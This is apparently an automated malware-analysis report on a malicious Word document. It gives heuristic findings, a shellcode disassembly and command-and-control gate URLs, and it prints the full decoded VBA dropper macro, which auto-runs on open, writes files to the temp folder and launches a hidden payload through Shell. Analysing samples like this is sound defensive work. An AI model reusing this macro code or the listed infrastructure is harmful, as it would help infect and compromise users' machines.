MALICIOUS
754
Risk Score
Malware Insights
MITRE ATT&CK
T1204.002 Malicious File
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1203 Exploitation for Client Execution
The sample is a malicious Microsoft Word document containing VBA macros that trigger an exploit (CVE-2008-2244). The macros attempt to create a Word application object and execute a dropped PE executable, likely a second-stage payload. The embedded PE executable and suspicious URLs suggest a downloader or dropper functionality.
Heuristics 22
-
CVE-2008-2244 — Microsoft Word record-parsing payload critical CVE likely CVE_2008_2244Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
-
OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
-
ClamAV: Doc.Macro.ObfuscatedChr-6203136-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ObfuscatedChr-6203136-0
-
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORYReference to WriteProcessMemory API
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dim hhf As Variant hhf = Shell(uyt, 0) End Function -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123" Set meLaTure = CreateObject("W" & "" & "or" & "d." & "Applicatio" & BHJASD) HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() VBJHQWD = "12kj12vhg12" & ";12[]1l '1" -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Sub Workbook_Open() GhbGGbv -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
End Function Sub Auto_Open() Lashature -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
TTGDFW = FygGr(3 + 90 + sts) DBDDW = Environ(TYGE) + TTGDFW JIEKR = "." & "tmp" & "" -
PEB access via FS segment (x86) high SC_PEB_ACCESSPEB access via FS segment (x86)
Disassembly
Attempted x86 opcode disassembly00006C59 648b5230 mov edx, dword ptr fs:[edx + 0x30] 00006C5D 2006 and byte ptr [esi], al 00006C5F 0c79 or al, 0x79 00006C61 1401 adc al, 1 00006C63 7228 jb 0x6c8d 00006C65 6a18 push 0x18 00006C67 59 pop ecx 00006C68 33ff xor edi, edi 00006C6A c8c0ac00 enter -0x5340, 0 00006C6E 3c61 cmp al, 0x61 00006C70 7c02 jl 0x6c74 00006C72 2c20 sub al, 0x20 00006C74 c1cf00 ror edi, 0 00006C77 0d03f8e2f0 or eax, 0xf0e2f803 00006C7C 81ff5b03bc4a cmp edi, 0x4abc035b 00006C82 6a8b push -0x75 00006C84 5a pop edx 00006C85 10981275dbee adc byte ptr [eax - 0x11248aee], bl 00006C8B c3 ret 00006C8C 058944241c add eax, 0x1c244489 00006C91 61 popal 00006C92 234455f0 and eax, dword ptr [ebp + edx*2 - 0x10] 00006C96 ec in al, dx 00006C97 51 push ecx 00006C98 53 push ebx 00006C99 1d565760cf sbb eax, 0xcf605756 00006C9E 7508 jne 0x6ca8 00006CA0 46 inc esi 00006CA1 7d0c jge 0x6caf 00006CA3 9a3dc94937d17c lcall 0x7cd1, 0x3749c93d 00006CAA 70db jo 0x6c87 00006CAC ac lodsb al, byte ptr [esi] 00006CAD 32c1 xor al, cl 00006CAF 398acd3aea01 cmp dword ptr [edx + 0x1ea3acd], ecx 00006CB5 d6 salc 00006CB6 b608 mov dh, 8 00006CB8 66 .byte 0x66
-
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 170,496 bytes but its declared streams total only 43,787 bytes — 126,709 bytes (74%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://hadfanawass.com/sl/gate.php|http://rophenreswi.ru/sl/gate.php|http://mihesfitons.ru/sl/gate.� In document text (OLE body)
- https://krrewiaog3u4npcg.onion.to/sl/gate.phpIn document text (OLE body)
- http://api.ipify.orgIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3013 bytes |
SHA-256: 69452a6c0f0153b2d6952895828b7e4cd9b244c637f2f0363df168e566d224d3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
VBJHQWD = "12kj12vhg12" & ";12[]1l '1"
GhbGGbv
End Sub
Sub Workbook_Open()
GhbGGbv
End Sub
Sub GhbGGbv()
Lashature
End Sub
Sub Lashature()
Dim bbgd As Boolean, sts As Integer, YGEW As String
VBHJQW = "1h2jben1v"
sts = -42 + 41
TYGE = "T" & "EM" & ""
TYGE = TYGE & "P"
bbgd = False
On Error Resume Next
Dim WOIEW As String
TTGDFW = FygGr(3 + 90 + sts)
DBDDW = Environ(TYGE) + TTGDFW
JIEKR = "." & "tmp" & ""
FFDRRF = "" & ".rtf"
LQWDO = DBDDW
FFFNNNF = LQWDO + "byfe" + FFDRRF
SSHHDD = DBDDW & "jwud" + FFDRRF
WOIEW = DBDDW & "" & "s2" & JIEKR
FssGeww (FFFNNNF)
FssGeww (SSHHDD)
Module1.Tyryka (2)
BHJASD = Chr(102 + 8)
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
Set meLaTure = CreateObject("W" & "" & "or" & "d." & "Applicatio" & BHJASD)
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
meLaTure.Visible = bbgd
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
meLaTure.Documents.Open (FFFNNNF)
Module1.Tyryka (2)
HYUASGD = Module1.Girow(WOIEW)
Module1.Tyryka (3)
meLaTure.Quit
Set meLaTure = Nothing
End Sub
Public Function FygGr(wbrw As Integer)
FygGr = Chr(wbrw)
End Function
Public Function FssGeww(vnhe As String)
ActiveDocument.SaveAs FileName:=vnhe, FileFormat:=5 + 1
End Function
Public Function TYGEvs()
TYGEvs = "T" & "EM"
End Function
Sub Auto_Open()
Lashature
End Sub
Attribute VB_Name = "Module1"
Sub Tyryka(Lknd As Long)
bfh = 53
Dim Khge As Long, Rtge As Long
Rtge = Lknd + Timer
Khge = Rtge
Do While Timer < Khge
vhue = 64 * 3 * 4 * 1 * 1 * 3 * 1
Loop
bfhre = 93 + 1
VAYTWGD = ";l1k23 ;l12" & "12j"
TWQYJDA = "'1;2l '12;"
BFHJASD = "1h2jkh32121"
End Sub
Public Function Girow(uyt As String)
Dim hhf As Variant
hhf = Shell(uyt, 0)
End Function
|
|||
embedded_office_0000624c.exe |
embedded-pe | Office MZ+PE at offset 0x624C | 145332 bytes |
SHA-256: fa4a537de730d9492019ce588a6c1712ef2d8444973f40dbc805c9933a2532c5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_GETPROCADDRESS, SC_STR_CREATEPROCESS Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, GetProcAddress, OpenProcess, VirtualAlloc, VirtualAllocEx Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.